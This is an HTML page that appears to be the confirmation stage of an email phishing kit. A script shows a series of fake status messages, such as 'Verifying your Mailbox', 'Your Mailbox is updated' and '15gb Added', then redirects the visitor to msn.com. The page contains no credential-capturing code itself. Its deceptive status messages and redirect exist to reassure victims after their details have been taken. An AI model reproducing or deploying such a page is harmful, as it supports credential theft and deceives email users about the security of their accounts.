<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Emal & Password Settings</title>
<meta http-equiv="REFRESH" content="20; http://msn.com">


<style type="text/css">
<!--
.style1 {font-family: "Courier New", Courier, monospace}
.style4 {font-family: "Courier New", Courier, monospace;
	color:#0066CC;
	font-size:20px;}

.style6 {color: #AAB7B8}
.style8 {font-size: 16}
-->
</style>
<script>



var preloadimages=new Array(":abstract.simplenet.com/point.gif","abstract.simplenet.com/point2.html")



var intervals=2300

//configure destination URL

var targetdestination="http://msn.com"





var splashmessage=new Array()

var openingtags='<font face="calibri" size="4" color="#000000">'

splashmessage[0]='Please wait......'

splashmessage[1]='Connecting to Email Center......'

splashmessage[2]='Your IP have limited access to our server......'

splashmessage[3]='Verifying your Mailbox......'

splashmessage[4]='Please wait......'

splashmessage[5]='Your Mailbox is updated'

splashmessage[6]='15gb Added ......'







var closingtags='</font>'



//Do not edit below this line (besides HTML code at the very bottom)



var i=0



var ns4=document.layers?1:0

var ie4=document.all?1:0

var ns6=document.getElementById&&!document.all?1:0

var theimages=new Array()



//preload images

if (document.images){

for (p=0;p<preloadimages.length;p++){

theimages[p]=new Image()

theimages[p].src=preloadimages[p]

}

}



function displaysplash(){

if (i<splashmessage.length){

sc_cross.style.visibility="hidden"

sc_cross.innerHTML='<b><center>'+openingtags+splashmessage[i]+closingtags+'</center></b>'

sc_cross.style.left=ns6?parseInt(window.pageXOffset)+parseInt(window.innerWidth)/2-parseInt(sc_cross.style.width)/2 :document.body.scrollLeft+document.body.clientWidth/2-parseInt(sc_cross.style.width)/2

sc_cross.style.top=ns6?parseInt(window.pageYOffset)+parseInt(window.innerHeight)/2-sc_cross.offsetHeight/2:document.body.scrollTop+document.body.clientHeight/2-sc_cross.offsetHeight/2

sc_cross.style.visibility="visible"

i++

}

else{

window.location=targetdestination

return

}

setTimeout("displaysplash()",intervals)

}



function displaysplash_ns(){

if (i<splashmessage.length){

sc_ns.visibility="hide"

sc_ns.document.write('<b>'+openingtags+splashmessage[i]+closingtags+'</b>')

sc_ns.document.close()



sc_ns.left=pageXOffset+window.innerWidth/2-sc_ns.document.width/2

sc_ns.top=pageYOffset+window.innerHeight/2-sc_ns.document.height/2



sc_ns.visibility="show"

i++

}

else{

window.location=targetdestination

return

}

setTimeout("displaysplash_ns()",intervals)

}







function positionsplashcontainer(){

if (ie4||ns6){

sc_cross=ns6?document.getElementById("splashcontainer"):document.all.splashcontainer

displaysplash()

}

else if (ns4){

sc_ns=document.splashcontainerns

sc_ns.visibility="show"

displaysplash_ns()

}

else

window.location=targetdestination

}

window.onload=positionsplashcontainer



</script>
<script><!--

 var jv=1.0;

//--></script>



<script language="Javascript1.1"><!--

 jv=1.1;

//--></script>



<script language="Javascript1.2"><!--

 jv=1.2;

//--></script>



<script language="Javascript1.3"><!--

 jv=1.3;

//--></script>



<script language="Javascript1.4"><!--

 jv=1.4;

//--></script><title>Account Security Settings </title></head>
<body marginheight="0" marginwidth="0" topmargin="0" bottommargin="0" leftmargin="0" rightmargin="0">

<table width="100%"  height="100%" align="center" bgcolor="#AAB7B8">


<tr><td bgcolor="" height="12%">
<br>
	<table width="75%" align="center" bgcolor="#AAB7B8"><tr><td>

		<table width="90%"  align="center" bgcolor="#AAB7B8"><tr>

		<td>
		



		<td width="80">

		</td>

		</tr></table>

	</td></tr></table>

</td></tr>





<tr><td bgcolor="" height="2%">
<hr width="100%" align="center" color="#AAB7B8">
</td></tr>




<tr><td height="85%">

	<table width="600" align="center">


<tr><td height="35"></td></tr>






<tr><td>


	<table width="600" align="center">

	


	<tr><td height="">
	
		<table width=""><tr>

		<td>
		<img src="loading2.gif" width="230" height="200">		</td>



		<td width="20"></td>



		<td width="350">
		<div align="center" class="style1" id="splashcontainer" style="visibility: visible; top: 363.5px;"> </div>		</td>

		</tr></table>

		<br><br><br><br><br><br>


	</td></tr>





	
	
	</table>


</td></tr>









<tr><td height="30"></td></tr>


<tr><td height="">


	

</td></tr>


</table>

</td></tr>




<tr><td bgcolor="" height="">
<hr width="100%" align="center" color="#AAB7B8">
</td></tr>




<tr><td height="21%" bgcolor="#AAB7B8">

	<table width="90%" height="80%" align="center">

	<a href="" style="text-decoration:none"><font face="calibri" size="2" color="#AAB7B8">Intellectual Property Policy and Infringement Claims</font></a>
			- <a href="" style="text-decoration:none"><font face="calibri" size="2" color="#6E6E6E">Privacy Policy</font></a>
			- <a href="" style="text-decoration:none"><font face="calibri" size="2" color="#6E6E6E">Terms of Use</font></a>

			</div>

	</td></tr>

	</table>

</td></tr>

</table>


</body>
</html>
